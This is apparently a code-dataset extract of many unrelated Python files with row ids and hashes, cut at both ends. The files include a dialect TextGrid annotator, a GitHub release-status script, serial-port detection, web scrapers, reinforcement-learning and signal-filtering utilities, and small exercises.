TextGrid_file_list = [file for file in os.listdir(tg_path) if file.endswith('.TextGrid')]
variant_match = dict()
for r in zip(lex_table['word_variant'], lex_table['word_standard'], lex_table['word_vars'],
lex_table['POS_tag']):
# dict with variant as key.
# if no match tag the thing
v_pattern = compile_pattern(r[0], r[2])
if v_pattern not in variant_match.keys():
variant_match[v_pattern] = []
else:
print(v_pattern) # add it? no
variant_match[v_pattern].append(r)
gehen_variants = set()
locations = lex_table.loc[lex_table['word_lemma'] == 'gehen']
for gehen_var in zip(locations['word_variant'], locations['word_vars']):
if "SAF5" not in gehen_var[1]:
g_pattern = compile_pattern(gehen_var[0], gehen_var[1])
gehen_variants.add(g_pattern)
# for gehen_row in lex_table.loc[lex_table['word_lemma'] == 'gehen']['word_variant']:
# # check the word_vars
# if not any("SAF5" in wv for wv in lex_table.loc[lex_table['word_variant'] == gehen_row]['word_vars']):
# g_pattern = compile_pattern(gehen_row)
# gehen_variants.add(g_pattern)
for each_file_name in TextGrid_file_list:
# now combine the files of the same speakers
print(each_file_name)
interval_num = 0
file_path = tg_path + each_file_name
try:
file_textgrid_obj = textgrid.TextGrid.fromFile(file_path)
except UnicodeDecodeError:
print(
each_file_name +
': the encode is weird, not utf-8 or ansi')
tier_list = file_textgrid_obj.tiers
for each_tier in tier_list:
if each_tier.name == 'SWG': # read from swg tier
tier_swg = each_tier
intervals_swg = tier_swg.intervals
try:
clauses = []
clause_annotation = []
time_segment = dict()
skip = False
begin_tag = ''
for each_annotation in intervals_swg:
annotation_mark = each_annotation.mark
beg_hms = timestamp_convert(each_annotation.minTime)
if not annotation_mark.strip(): continue
punct = [',', '.', '!', '?'] # maybe just . ! ?
tokens = annotation_mark.split()
time_segment[beg_hms] = tokens
for token in tokens:
if any(p in token for p in punct): # function that turn segments into clauses
if all(c in string.punctuation for c in token): # this is for token like ... --- and ???
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(token)
if len(token) > 3 or token in punct: # why do I do this again, still don't know
clause_annotation.append(time_stamp)
clauses.append(clause_annotation)
clause_annotation = []
continue
word_punct_split = re.findall(
r"[^\w\d\s,.!?]*\w+[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*|[^\w\s]", token,
re.UNICODE) # separate word with punctuation
for wp in word_punct_split: # maybe to split annotations into clauses
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(wp)
if all(c in punct for c in wp):
clause_annotation.append(time_stamp)
clauses.append(clause_annotation)
clause_annotation = []
else:
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(token)
for cl in clauses:
if '[ANT]' in cl or '[REL]' in cl:
# print("clause", cl)
beg_hms = cl[-1]
# print("time", beg_hms)
cl = cl[:-1]
# print("cl", cl)
if cl[0] not in time_segment[beg_hms]: # closer remaining is the punctuation problem
segment_annotation = []
for token in time_segment[beg_hms]:
segment_annotation += re.findall(
r"[^\w\d\s,.!?]*\w+[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*|[^\w\s]", token,
re.UNICODE)
if cl[0] not in segment_annotation:
print(segment_annotation)
print(cl[0])
else:
segment_annotation = time_segment[beg_hms]
sym_seq = segment_annotation.index(cl[0]) + 1
words_std = []
ddm_tags = []
pos_sent = []
# get ddm
for i, word in enumerate(cl):
if word: # empty word check
# match w with word_variant
std_list = set()
ddm_list = set()
pos_list = set()
no_match = True
rel = False
# check for var: REL
if i + 1 < len(cl): # make sure next word exist
w_next = cl[i + 1]
if "[REL]" in w_next:
rel = True
if "wo" in word:
rel_var = " RELd"
elif "als" in word or word.startswith("d") or word.startswith(
"wel") or word.startswith("jed"):
rel_var = " RELs"
elif ("was" in word) or ("wie" in word) or ("wer" in word):
rel_var = " RLOs"
else:
rel_var = " UNK"
for p in variant_match.keys():
if p.search(word) is not None: # .lower()
no_match = False
for values in variant_match[p]:
swg = values[0].replace("*", "")
# rum[ge]draat
if "ge" in swg and "ge" not in word:
swg = swg.replace("ge", "g") # for gespielt gspielt
std = values[1].replace("*", "")
std_list.add(std)
if isinstance(values[2], float) and math.isnan(
values[2]): # check for empty var_code
pass # do nothing
else:
ddm_list.add(values[2]) # should be set
if isinstance(values[3], float) and math.isnan(values[3]):
pos_list.add('*')
else:
pos_list.add(values[3])
if no_match:
standard = word
ddm = "*"
pos = pos_tagger.tag([word])[0][1]
if "$" in pos:
pos = "*"
else:
standard = " ".join(std_list)
ddm = " ".join(str(d) for d in ddm_list)
if any("SAF5" in d for d in ddm_list):
for g_pattern in gehen_variants:
if g_pattern.search(word) is not None:
print(ddm)
print(word)
print("!") # gegang* [ge]gang* will be taged as SAF5
# k as prefix
ddm = ddm.replace("SAF5d", "")
ddm = ddm.replace("SAF5s", "")
print(ddm)
pos = " ".join(str(p) for p in pos_list)
if rel:
if ddm != "*":
ddm = ddm + rel_var
else:
ddm = rel_var
ddm = ddm.strip()
words_std.append(standard)
ddm_tags.append(ddm)
pos_sent.append(pos)
# columns
output_clauses_csv(extract_path, each_file_name[each_file_name.rfind("_") + 1:-9], beg_hms, sym_seq,
" ".join(cl), " ".join(ddm_tags),
" ".join(pos_sent))
except AttributeError as e:
print(
each_file_name +
': tier words is empty or does not exist ')
traceback.print_tb(e.__traceback__)
# if __name__ == '__main__':
# date = '20220310'
# types = 'noSocialInfo' + '.csv'
# working_directory = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/'
# # simplify this
# extract_type = 'clauses_rel'
# speaker_tg_path_dict = {
# working_directory + 'SWG_trend_' + extract_type + '_' + date + types: [working_directory + 'trend_tg/'],
# working_directory + 'SWG_twin_' + extract_type + '_' + date + types: [working_directory + 'twin_tg/'],
# working_directory + 'SWG_panel_' + extract_type + '_' + date + types: [working_directory + 'recovery_1982/',
# working_directory + 'recovery_2017/']}
# speaker_tg_path_dict = {'SWG_trend_' + extract_type + '_' + date + types: [working_directory + 'trend_tg/']}
# speaker_tg_path_dict = {'SWG_panel_clauses_rel_'+date_type:[working_directory+'recovery_1982/',working_directory+'recovery_2017/'], 'SWG_trend_clauses_rel_'+date_type:[working_directory+'trend_tg/']} #
# 'SWG_twin_clauses_rel_'+date_type:[working_directory+'twin_tg/']๏ผ 'SWG_style_' + extract_type + '_' + date + types: [working_directory + 'style_tg/']
# lex_table_path = working_directory+'SG-LEX 12feb2021.csv'
# done_path = working_directory+"done/"
# for extract_name in speaker_tg_path_dict.keys():
# for tg_path in speaker_tg_path_dict[extract_name]:
# extract_path = extract_name
# transform = Transform(tg_path, extract_path)
# transform.start()
# tg_path = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/test/'
# extract_path = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/test.csv'
# transform = Transform(tg_path, extract_path)
# transform.start()
|
12,940 | dfd901ef7651f318d31ddebb113af4980b775921 | # For some reason patch releases with Semantic Release are tagged as "pre-release" on GitHub. This script
# removes the "pre-release" tag from the release.
import os
import sys
import requests
USAGE = f"Usage: python {sys.argv[0]} [--help] | version_being_released (e.g., v0.19.1)]"
def get_prerelease_status(version_being_released, token):
url = f"https://api.github.com/repos/feast-dev/feast/releases/tags/v{version_being_released}"
headers = {
"Content-Type": "application/json",
"Accept": "application/vnd.github.v3+json",
"Authorization": f"Bearer {token}"
}
response = requests.request("GET", url, headers=headers)
response_json = response.json()
return bool(response_json['prerelease']), response_json['id']
def set_prerelease_status(release_id, status, token):
url = f"https://api.github.com/repos/feast-dev/feast/releases/{release_id}"
payload = {"prerelease": status}
headers = {
"Content-Type": "application/json",
"Accept": "application/vnd.github.v3+json",
"Authorization": f"Bearer {token}"
}
requests.request("PATCH", url, json=payload, headers=headers)
def main() -> None:
args = sys.argv[1:]
if not args or len(args) != 1:
raise SystemExit(USAGE)
version_being_released = args[0].strip() # should look like 0.19.1 (without the v)
print(f"Disabling prerelease status for {version_being_released}")
token = os.getenv('GITHUB_TOKEN', default=None)
if token is None:
raise OSError("GITHUB_TOKEN environmental variable is not set")
is_prerelease, release_id = get_prerelease_status(version_being_released, token)
if is_prerelease:
set_prerelease_status(release_id, False, token)
else:
print(f"{version_being_released} is not a pre-release, exiting.")
exit(0)
is_prerelease, release_id = get_prerelease_status(version_being_released, token)
if is_prerelease:
import warnings
warnings.warn(f"Failed to unset prerelease status for {version_being_released} release id {release_id}")
else:
print(f"Successfully unset prerelease status for {version_being_released} release id {release_id}")
if __name__ == "__main__":
main()
|
12,941 | f8370a6f0e38ab9bf7b94706b89daefcc3100d41 |
import sys
from os.path import join, dirname, abspath
import serial
#import serial.tools.list_ports as port_list
#from serial.tools import *
from qtpy import uic
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt
from qtpy.QtWidgets import QApplication, QMainWindow, QMessageBox, QAction, QDialog, QTableWidgetItem
from pyqtgraph import PlotWidget
import pyqtgraph as pg
from collections import deque
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGroupBox
import math
import os
import numpy as np
import random
import qtmodern.styles
import qtmodern.windows
import time
import json
import pprint
from math import pi, sin
from PyQt5.QtMultimedia import *
import struct
from time import sleep
class DetectDevices(object):
def __init__(self):
self.ports = []
self.usbports = []
self.selected_ports = []
self.MarlinPort = ["NA"]
self.SensorPort = ["NA"]
self.EncoderPort = ["NA"]
def listPorts(self):
from serial.tools.list_ports import comports
self.ports = list(comports())
return self.ports
def listUsbPorts(self):
self.listPorts()
self.usbports.clear()
if len(self.ports) > 0:
for port in self.ports:
if 'USB' in port[2]:
self.usbports.append(port)
#print('USB Detected : ' + port[2])
def printPorts(self):
self.listPorts()
if len(self.ports) > 0:
for port in self.ports:
print(port[0])
#for itm in port:
#print(itm)
def printUsbPorts(self):
self.listUsbPorts()
if len(self.usbports) > 0:
for port in self.usbports:
print(port[0])
def detectCustomBoards(self):
uart_lines = []
skip_loop = False
self.listUsbPorts()
print(f"Number of USB Ports : {len(self.usbports)}")
print('waiting 5 seconds')
time.sleep(5)
if len(self.usbports) > 0:
for port in self.usbports:
uart_lines = self.connectAndRead(port)
for line in uart_lines:
if b'Marlin' in line:
self.MarlinPort = port
skip_loop = True
break
if skip_loop:
skip_loop = False
continue
for line in uart_lines:
if b'Encoder Board' in line:
self.EncoderPort = port
skip_loop = True
break
if skip_loop:
skip_loop = False
continue
self.SensorPort = port
def connectAndRead(self, port):
xlines = []
print(f"Opening Port : {port[0]}")
indx = 0
try:
uart = serial.Serial(port[0], baudrate=115200, timeout=1)
time.sleep(1.5)
#while uart.in_waiting:
while indx < 10:
indx += 1
line = uart.readline()
#print(line.decode('ascii'))
#time.sleep(0.2)
xlines.append(line)
if len(xlines) > 10:
break
if len(xlines) > 0:
return xlines
else:
return ["NONE"]
except Exception as e:
print(f"Error Connect Or Reading Serial Port:{port[0]} " + str(e))
return None
|
12,942 | 69f4ed7495f4e65173a7e89f0eb5916bb2c3173d | # coding=utf-8
# Created by OhBonsai at 2018/3/13
# -*- coding: utf-8 -*-
from faker import Faker
from app.models.user import User, Group
def create_admin():
u = User(username='sketch')
u.email = 'letbonsaibe@gmail.com'
u.is_admin = True
u.set_password("123456")
u.admin = True
return u
def create_user():
u = User(username='test')
u.email = 'letbonsaibe@gmail.com'
u.set_password("123456")
u.admin = True
return u
def create_group():
g = Group(name='test')
return g
def create_users(n=50):
fake = Faker()
fake.seed(42)
users = []
for i in range(n):
u = User(username=fake.name())
u.email = fake.email()
u.set_password(fake.password())
users.append(u)
return users
def sketch(**kwargs):
user = User(username="sketch")
user.email = "letbonsaibe@gmail.com"
user.set_password("123456")
user.is_admin = True
return user.apply_kwargs(kwargs), "123456"
def lotus(**kwargs):
user = User(username="sketch")
user.email = "letbonsaibe@gmail.com"
user.set_password("123456")
return user.apply_kwargs(kwargs), "123456"
|
12,943 | adc240632b8782901fbdff2579cd8ef3e7321171 |
def main():
H,W,K=map(int,input().split())
S=[]
for i in range(H):
col=list(map(int,list(input())))
S.append(col)
CumulativeS=[[S[i][0]] for i in range(H)]
for i in range(len(S)):
for j in range(1,len(S[i])):
CumulativeS[i].append(CumulativeS[i][j-1]+S[i][j])
for i in range(1,len(S)):
for j in range(len(S[i])):
CumulativeS[i][j]+=CumulativeS[i-1][j]
all_bit=1<<H-1
res=10000
for bit in range(all_bit):
wide_bound=[]
for i in range(H-1):
if (bit & (1<<i))!=0:
wide_bound.append(i)
res_=len(wide_bound)
high_bound=[]
high_flag=0
for i in range(W):
if len(high_bound)==0:
for b in range(len(wide_bound)):
if b==0:
white_chocolate=CumulativeS[wide_bound[b]][i]
else:
white_chocolate=CumulativeS[wide_bound[b]][i]-CumulativeS[wide_bound[b-1]][i]
if white_chocolate>K:
if i-1<0:
high_flag=1
break
high_bound.append(i-1)
break
if b==len(wide_bound)-1:
white_chocolate=CumulativeS[H-1][i]-CumulativeS[wide_bound[b]][i]
if white_chocolate > K:
if i-1<0:
high_flag=1
break
high_bound.append(i - 1)
if high_flag==1:
break
if len(wide_bound)==0:
white_chocolate = CumulativeS[H - 1][i]
if white_chocolate>K:
if i-1<0:
high_flag=1
break
high_bound.append(i-1)
else:
for b in range(len(wide_bound)):
if b == 0:
white_chocolate = CumulativeS[wide_bound[b]][i]-CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]
else:
white_chocolate = CumulativeS[wide_bound[b]][i] - CumulativeS[wide_bound[b - 1]][i]-CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]+CumulativeS[wide_bound[b-1]][high_bound[len(high_bound)-1]]
if white_chocolate>K:
if i-1<0:
high_flag=1
break
high_bound.append(i-1)
break
if b == len(wide_bound) - 1:
white_chocolate = CumulativeS[H - 1][i] - CumulativeS[wide_bound[b]][i]-CumulativeS[H-1][high_bound[len(high_bound)-1]]+CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]
if white_chocolate>K:
if i-1<0:
high_flag=1
break
high_bound.append(i-1)
if high_flag==1:
break
if len(wide_bound)==0:
white_chocolate = CumulativeS[H - 1][W - 1]-CumulativeS[H-1][high_bound[len(high_bound)-1]]
if white_chocolate>K:
if i-1<0:
high_flag=1
break
high_bound.append(i-1)
res_+=len(high_bound)
if res_<res and high_flag==0:
res=res_
print(res)
if __name__=="__main__":
main() |
12,944 | 8b9ea17246b362884d10574cd6d7719d495c1be6 | if __name__ == "__main__":
from gol import run, GOL, PATTERNS
import numpy as np
size = 100
n_patterns = 20
board = np.zeros((size, size), dtype="int")
for i in range(n_patterns):
pattern = np.random.choice(PATTERNS)
row = np.random.choice(np.arange(size))
col = np.random.choice(np.arange(size))
pattern.add_to(board, row, col)
gol = GOL(board)
gol.add_random_cells(coverage=0.3)
run(gol)
|
12,945 | 6b1fd8954ba93e7563e9a10d80b135904d16f35e | #!/usr/bin/env mayapy
import inspect
import os
import sys
THIS_FILE = os.path.normpath(os.path.abspath(inspect.getsourcefile(lambda: None)))
THIS_DIR = os.path.dirname(THIS_FILE)
PYMEL_ROOT = os.path.dirname(THIS_DIR)
sys.path.insert(0, PYMEL_ROOT)
import pymel.internal.apicache as apicache
import pymel.internal.startup
import pymel.util as _util
logger = pymel.internal.startup._logger
bridgeCache = apicache.ApiMelBridgeCache()
bridgeCache.load()
print "read: {}".format(bridgeCache.path())
for version in apicache.ApiCache.allVersions():
cacheInst = apicache.ApiCache()
cacheInst.version = version
cacheInst.load()
print "updating: {}".format(cacheInst.path())
_util.mergeCascadingDicts(bridgeCache.apiClassOverrides, cacheInst.apiClassInfo,
allowDictToListMerging=True)
cacheInst.save()
|
12,946 | 641c3e950944fe3c736c7abb8dc738c1f8a943a1 | import os, sys
os.environ['DJANGO_SETTINGS_MODULE'] = 'tinla.settings'
ROOT_FOLDER = os.path.realpath(os.path.dirname(__file__))
ROOT_FOLDER = ROOT_FOLDER[:ROOT_FOLDER.rindex('/')]
if ROOT_FOLDER not in sys.path:
sys.path.insert(1, ROOT_FOLDER + '/')
# also add the parent folder
PARENT_FOLDER = ROOT_FOLDER[:ROOT_FOLDER.rindex('/')+1]
if PARENT_FOLDER not in sys.path:
sys.path.insert(1, PARENT_FOLDER)
import xlrd
from accounts.models import *
from catalog.models import *
from datetime import datetime
from dealprops.models import *
deal = FridayDeal.objects.get(id=1)
flag = True
sequence = 1
errors = []
skus = """
""".split("\n")
book = xlrd.open_workbook('/home/kishan/apps/tinla/scripts/freaking_friday_model.xls')
sh = book.sheet_by_index(0)
header = sh.row(0)
map = {}
idx = 0
for idx in range(sh.ncols):
map[header[idx].value.strip().lower()] = idx
errors = []
to_update = []
for row_count in range(1, sh.nrows):
row = sh.row(row_count)
try:
article_id = row[map['articleid']].value
sku = row[map['skuid']].value
start_time = row[map['starttime']].value
end_time = row[map['endtime']].value
to_update.append({
'article_id': str(article_id).split('.')[0],
'sku':str(sku).split('.')[0],
'start_time':start_time,
'end_time':end_time,
})
except KeyError:
flag = False
errors.append('Unsupported excel file.')
for item in to_update:
try:
id = item['article_id']
src = SellerRateChart.objects.get(article_id=id,seller__client=5)
except:
flag = False
errors.append("SKU not found: %s" % id)
if flag:
for item in to_update:
id = item['article_id']
src = SellerRateChart.objects.get(article_id=id,seller__client=5)
prod = FridayDealProducts()
prod.deal = deal
prod.product = src.product
prod.sequence = sequence*10
prod.starts_on = datetime.strptime(item['start_time'],'%d-%m-%Y %I:%M:%S %p')
prod.ends_on = datetime.strptime(item['end_time'],'%d-%m-%Y %I:%M:%S %p')
prod.save()
sequence += 1
print "ADDED::",id
else:
for err in errors:
print err
|
12,947 | 4f1d9f74cacbfd148e387301040cdfb0f515dc9e | # Web Scraping Yelp
# Import requests, BeautifulSoup, and random library
import requests
from bs4 import BeautifulSoup
from random import randint,choice
# Scrape Yelp function
def ScrapeYelp(loc):
base_url = 'https://www.yelp.com/search?find_desc=Restaurants&find_loc='
page = 0
#print(yelp_r.status_code)
#yelp_html = yelp_r.text
#print(yelp_html)
#print(yelp_soup.prettify())
# Randomly select a page to read from, request url
restaurants = []
page = randint(0,4) * 30
url = base_url + loc + '&start=' + str(page)
yelp_r = requests.get(url)
# Parse html, find restaurant tabs, business name and address within each tab
yelp_soup = BeautifulSoup(yelp_r.text, 'html.parser')
businessinfo = yelp_soup.findAll('div',{'class':'largerScrollablePhotos__373c0__3FEIJ'})
for i in range(len(businessinfo)):
busname = businessinfo[i].findAll('div',{'class':"businessName__373c0__1fTgn"})
address = businessinfo[i].findAll('address',{'class':'lemon--address__373c0__2sPac'})
# For results with a leading number, remove number (it was annoying)
try:
busname = busname[0].text.split('.')
busname.remove(busname[0])
busname = ''.join(busname)
restaurants.append((busname,address[0].text))
except:
restaurants.append((busname,'no address'))
restaurants = list(set(restaurants))
return restaurants
# Define Scrape AMC function
def ScrapeAMC():
# Get url for movie section, parse, and find movie grids
url = 'https://www.amctheatres.com/movies'
AMC_r = requests.get(url)
AMC_soup = BeautifulSoup(AMC_r.text, 'html.parser')
movies = AMC_soup.findAll('div',{'class':'PosterContent'})
movie_list = []
# Find name of each movie from within each grid
for movie in movies:
Name = movie.findAll('h3')
movie_list.append(Name[0].text)
return movie_list
# Define main function
def Main():
# Input location for yelp search
loc = input('Where are you going on your date?: ')
loc = loc.replace(' ','+')
print('Your dinner and movie are being generated...')
restaurants = ScrapeYelp(loc)
movies = ScrapeAMC()
# Randomly select dinner and movie
food = choice(restaurants)
movie = choice(movies)
print('Dinner:', food[0], 'at', food[1])
print('Movie: ',movie)
Main()
|
12,948 | 44f720dc02326fc9fb6ab7ab55a2a164ff9bbc6f | """
Utility functions that operate on landlab grids.
------------------------------------------------
"""
import numpy as np
def resolve_values_on_active_links(grid, active_link_values):
"""Resolve active-link values into x and y directions.
Takes a set of values defined on active links, and returns those values
resolved into the x and y directions. Two link arrays are returned:
x, then y.
Parameters
----------
grid : ModelGrid
A ModelGrid.
active_link_values : ndarray
Values on active links.
Returns
-------
tuple of ndarray
Values resolved into x-component and y-component.
"""
link_lengths = grid.length_of_link[grid.active_links]
return (
np.multiply(
(
(
grid.node_x[grid._activelink_tonode]
- grid.node_x[grid._activelink_fromnode]
)
/ link_lengths
),
active_link_values,
),
np.multiply(
(
(
grid.node_y[grid._activelink_tonode]
- grid.node_y[grid._activelink_fromnode]
)
/ link_lengths
),
active_link_values,
),
)
def resolve_values_on_links(grid, link_values):
"""Resolve link values into x and y directions.
Takes a set of values defined on active links, and returns those values
resolved into the x and y directions. Two link arrays are returned:
x, then y.
Parameters
----------
grid : ModelGrid
A ModelGrid.
link_values : ndarray
Values on links.
Returns
-------
tuple of ndarray
Values resolved into x-component and y-component.
"""
return (
np.multiply(
(
(
grid.node_x[grid.node_at_link_head]
- grid.node_x[grid.node_at_link_tail]
)
/ grid.length_of_link
),
link_values,
),
np.multiply(
(
(
grid.node_y[grid.node_at_link_head]
- grid.node_y[grid.node_at_link_tail]
)
/ grid.length_of_link
),
link_values,
),
)
|
12,949 | cf25c933f98501d2525b96908e8bbf798f81fd85 |
import pigpio
import datetime
import time
highTrig = False
lastPress = datetime.datetime.now()
pi = pigpio.pi()
pi.set_mode(12, pigpio.INPUT)
def changeMode(pressTime):
global highTrig
if((pressTime - lastPress).total_seconds()*1000 >= 200):
highTrig = not highTrig
print("debounced, flipping highTrig to {}").format(highTrig)
print((pressTime - lastPress).total_seconds()*1000)
return datetime.datetime.now()
while True:
if pi.wait_for_edge(12, pigpio.RISING_EDGE, .01):
pressed = datetime.datetime.now()
lastPress = changeMode(pressed)
|
12,950 | e94922ca1837a949efbd7084916ea5567f0fc2f9 | from selenium.webdriver.common.by import By
from Pages.GoogleResultPage import GoogleResultPage
from Pages.Page import Page
class GoogleMainPage(Page):
#SEARCH_INPUT = (By.NAME, 'q')
SEARCH_INPUT = "//input[@name='q']"
SEARCH_BTN = "//input[@name='btnK']"
def __init__(self, driver):
super().__init__(driver)
def search_text(self, text):
self.find_element(self.SEARCH_INPUT).send_keys(text)
self.find_element(self.SEARCH_BTN).submit()
return GoogleResultPage(self.driver) |
12,951 | 140371f2e93ee1d1023739bab8b119c1953bf3d0 | """
็ฅ็ป็ฝ็ปๅๅไผ ๆญ็ฎๆณ
"""
import tensorflow as tf
# ๅฎไนw1,w2ไธคไธชๅ้
w1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))
w2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))
# ๅฎไน่พๅ
ฅ
x = tf.constant([0.7,0.9],shape=(1,2))
print(x.shape)
# ๅ็ธไผ ๆญ
a = tf.matmul(x,w1)
y = tf.matmul(a,w2)
## ่ฟ็ฎ ##
sess = tf.InteractiveSession()
# ๅๅงๅๆๆๅ้๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผๅพๅฎนๆๅฟ่ฎฐ
ops = tf.global_variables_initializer()
sess.run(ops)
print(sess.run(y))
sess.close()
|
12,952 | d044da7cf6b3ce1f2389a01a9be4f191262974d6 | zum,yum=map(int,input().split())
lent,fen=map(int,input().split())
sum=abs(zum-lent)
som=abs(yum-fen)
print(sum,som)
|
12,953 | 3b861e73e98129869ee483a1488c36a324acb04f | k=int(input());print(50,*[k//50+i+(i+k%50>49)for i in range(50)]) |
12,954 | f0b84cca16bf09b9add670c39c4488fd1f44616b | # -*- coding: utf-8 -*-
TITLE = "Boo's Writing ante-alpha 0.2"
DEFAULT_SIZE = 800,600
INPUT_WINDOW_SIZE = 200,200
PROGRAM_ICON = 'ico/logo.png' |
12,955 | a5f72b36ddaaa7b0a2ceb60d774b4bd6cd4db8d7 | class Stack:
def __init__(self):
"""__init__ is used to establish baseline of calss for each instantiation"""
self.items = []
def push(self, item):
"""take the item passed as an argument and append to end of list"""
self.items.append(item)
def pop(self):
"""return and Remove the last element from the Stack, items does this natively"""
if self.items:
return self.items.pop()
return None
def peek(self):
"""look at the last item on the stack, without removing"""
if self.items:
return self.items[-1]
return None
def size(self):
"""Return the length of the stack"""
return len(self.items)
def is_empty(self):
"""Return true or false if there are any items in the list"""
return self.items == []
|
12,956 | 33a50df66c8d1ab0244833655f46c2313c48ffd3 | import tensorflow as tf
import random
import numpy as np
class Reinforce():
def __init__(self,
sess,
optimizer,
policy_network,
max_layers,
global_step,
division_rate= 100.0,
reg_param=0.001,
discount_factor=0.99,
exploration=0.3):
'''
Notation:
policy network : used describe model that predicts hyperparameters
learned network : learned network with hyper params as recommended
Args:
sess: tensorflow session
optimizer : type of optimization algorithm used for minimization
policy network : final tensorflow output state of the policy network
max_layers: the maximum number of layers for the learned neural network
global_step : number of cycles of learning of policy network (i,e gradient updates)
reg_param : lambda for l2 regularizaion of loss of policy network
discoun_factor : as stated
exploration : not used for anything right now (but meant for random exploration)
'''
self.sess = sess
self.optimizer = optimizer
self.policy_network = policy_network
self.division_rate = division_rate
self.reg_param = reg_param
self.discount_factor=discount_factor
self.max_layers = max_layers
self.global_step = global_step
self.reward_buffer = []
self.state_buffer = []
self.create_variables()
var_lists = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
self.sess.run(tf.variables_initializer(var_lists))
def get_action(self, state):
'''Given the state of the neural network (Rewards so far are stored
interanally as member variables) get new state.
'''
return self.sess.run(self.predicted_action, {self.states: state})
def create_variables(self):
with tf.name_scope("model_inputs"):
# raw state representation
self.states = tf.placeholder(tf.float32, [None, self.max_layers*4], name="states")
with tf.name_scope("predict_actions"):
# initialize policy network
with tf.variable_scope("policy_network"):
# In this case this is just the final state of the RNN
self.policy_outputs = self.policy_network(self.states,
self.max_layers)
# Identity is used to remember the last policy_output how
# tf.identity works isn't completely clear to me but for
# now I'll trust that this works: it's basically deep copy
self.action_scores = tf.identity(self.policy_outputs,
name="action_scores")
# Scale them and cast them into int:
# Note this doesn't depend on the reward
# All that matters is the hidden weights of my policy controller
# The reward is used to update those weights
self.predicted_action = tf.cast(tf.scalar_mul(self.division_rate, self.action_scores),
tf.int32,
name="predicted_action")
# regularization loss
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="policy_network")
# compute loss and gradients
with tf.name_scope("compute_gradients"):
# gradients for selecting action from policy network
self.discounted_rewards = tf.placeholder(tf.float32, (None,), name="discounted_rewards")
with tf.variable_scope("policy_network", reuse=True):
self.logprobs = self.policy_network(self.states,
self.max_layers)
print("self.logprobs", self.logprobs)
# compute policy loss and regularization loss
self.cross_entropy_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logprobs[:, -1, :],
labels=self.states)
self.pg_loss = tf.reduce_mean(self.cross_entropy_loss)
self.reg_loss = tf.reduce_sum([tf.reduce_sum(tf.square(x)) for x in policy_network_variables]) # L2 by the look of itRegularization
self.loss = self.pg_loss + self.reg_param * self.reg_loss
#compute gradients
self.gradients = self.optimizer.compute_gradients(self.loss)
# compute policy gradients
for i, (grad, var) in enumerate(self.gradients):
if grad is not None:
self.gradients[i] = (grad * self.discounted_rewards, var)
# training update
with tf.name_scope("train_policy_network"):
# apply gradients to update policy network
self.train_op = self.optimizer.apply_gradients(self.gradients,
global_step=self.global_step)
def storeRollout(self, state, reward):
'''Caching for the win: for long running programs this is a shite
solution
'''
self.reward_buffer.append(reward)
self.state_buffer.append(state[0])
def train_step(self, steps_count):
'''
This is where policy gradientx happens
but to understand this also understand create_variable function
steps_count: how many previous states to consider
'''
# take the last steps_count number of states
states = np.array(self.state_buffer[-steps_count:])/self.division_rate
# rewards are never discounted
rewars = self.reward_buffer[-steps_count:]
_, ls = self.sess.run([self.train_op, self.loss],
{self.states: states,
self.discounted_rewards: rewars})
return ls
|
12,957 | c0a183e319faf01f32cf486e22ef1020c6844ef7 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 19 13:30:38 2021
# Author: Timon Merk <timon.merk95@gmail.com>
"""
import numpy as np
import mne
def calc_band_filters(f_ranges, sfreq, filter_length="1000ms", l_trans_bandwidth=4, h_trans_bandwidth=4):
""""Calculate bandpass filters with adjustable length for given frequency ranges.
This function returns for the given frequency band ranges the filter coefficients with length "filter_len".
Thus the filters can be sequentially used for band power estimation.
Parameters
----------
f_ranges : list of lists
frequency ranges.
sfreq : float
sampling frequency.
filter_length : str, optional
length of the filter. Human readable (e.g."1000ms" or "1s"). Default is "1000ms"
l_trans_bandwidth : float, optional
Length of the lower transition band. The default is 4.
h_trans_bandwidth : float, optional
Length of the higher transition band. The default is 4.
Returns
-------
filter_bank : ndarray, shape(n_franges, filter length samples)
filter coefficients
"""
filter_list = list()
for f_range in f_ranges:
h = mne.filter.create_filter(None, sfreq, l_freq=f_range[0], h_freq=f_range[1], fir_design='firwin',
l_trans_bandwidth=l_trans_bandwidth, h_trans_bandwidth=h_trans_bandwidth,
filter_length=filter_length)
filter_list.append(h)
filter_bank = np.vstack(filter_list)
return filter_bank
def apply_filter(data, filter_bank, sfreq):
"""Apply previously calculated (bandpass) filters to data.
Parameters
----------
data : array (n_samples, ) or (n_channels, n_samples)
segment of data.
filter_bank : array
output of calc_band_filters.
sfreq : float
sampling frequency.
Returns
-------
filtered : array
(n_chan, n_fbands, filter_len) array conatining the filtered signal
at each freq band, where n_fbands is the number of filter bands used to decompose the signal
"""
if data.ndim == 1:
filtered = np.zeros((1, filter_bank.shape[0], sfreq))
for filt in range(filter_bank.shape[0]):
filtered[0, filt, :] = np.convolve(filter_bank[filt,:], data)[int(sfreq-sfreq/2):int(sfreq+sfreq/2)]
elif data.ndim == 2:
filtered = np.zeros((data.shape[0], filter_bank.shape[0], sfreq))
for chan in range(data.shape[0]):
for filt in range(filter_bank.shape[0]):
filtered[chan, filt, :] = np.convolve(filter_bank[filt, :], \
